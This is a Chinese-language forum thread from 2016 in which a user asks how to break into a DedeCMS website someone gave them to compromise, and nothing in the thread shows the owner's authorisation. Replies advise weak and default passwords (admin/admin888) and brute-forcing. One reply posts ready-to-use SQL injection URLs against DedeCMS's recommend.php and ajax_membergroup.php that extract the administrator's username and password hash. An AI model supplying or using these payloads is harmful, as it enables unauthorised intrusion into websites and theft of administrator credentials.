yer兮 发表于 2016-8-15 19:46:45

求助dedecms

饿,事情是这样的,今天看了一个站点,别人丢给了我,让我拿,我试了很多办法都不行,当然最后更新日志20140814 试了很多exp不好使,

旁站没有 没思路,看人家轻松拿下,好失望啊,


    弱口令不行, burp不行, 唉

w2015 发表于 2016-8-15 23:16:52

是不是远程写文件哦!1408的好像exp都不行!可能存在备份,或者错误文件泄露了密码!

yer兮 发表于 2016-8-16 10:59:00

RE: 求助dedecms

w2015 发表于 2016-8-15 23:16
是不是远程写文件哦!1408的好像exp都不行!可能存在备份,或者错误文件泄露了密码! ...

那我要从哪里开始呢:'(

w2015 发表于 2016-8-16 13:15:10

RE: 求助dedecms

yer兮 发表于 2016-8-16 10:59
那我要从哪里开始呢

既然人家很容易就拿下了,或许你可以多试试弱口令。同时可以试试万能密码这个不错的选择。

yer兮 发表于 2016-8-16 13:36:17

RE: 求助dedecms

w2015 发表于 2016-8-16 13:15
既然人家很容易就拿下了,或许你可以多试试弱口令。同时可以试试万能密码这个不错的选择。 ...

我去dede有弱口令?

w2015 发表于 2016-8-16 16:26:05

RE: 求助dedecms

yer兮 发表于 2016-8-16 13:36
我去dede有弱口令?

你认为呢?

yer兮 发表于 2016-8-17 16:42:29

RE: 求助dedecms

w2015 发表于 2016-8-16 16:26
你认为呢?

弱口令试了拿不下:'( 用我字典burp下也不行

sladjfksld 发表于 2016-8-17 17:32:40

这个版本,已公布的漏洞可以试试远程写入exp和会员中心的注入(前提是网站开启会员功能)

481326635 发表于 2016-8-18 17:59:56

“/data/admin/ver.txt”页面获取系统最后升级时间,


/plus/recommend.php?action=&aid=1&_FILES=\'or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES=1.jpg&_FILES=application/octet-stream&_FILES=6878


访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,存在页面代表有漏洞

查看管理员帐号

/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`

查看管理员密码
/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@

这几个是网上公开的,可以试试弱口令admin admin888之类的

yer兮 发表于 2016-8-18 19:05:40

RE: 求助dedecms

481326635 发表于 2016-8-18 17:59
“/data/admin/ver.txt”页面获取系统最后升级时间,




谢谢:)嘿嘿
页: [1] 2
查看完整版本: 求助dedecms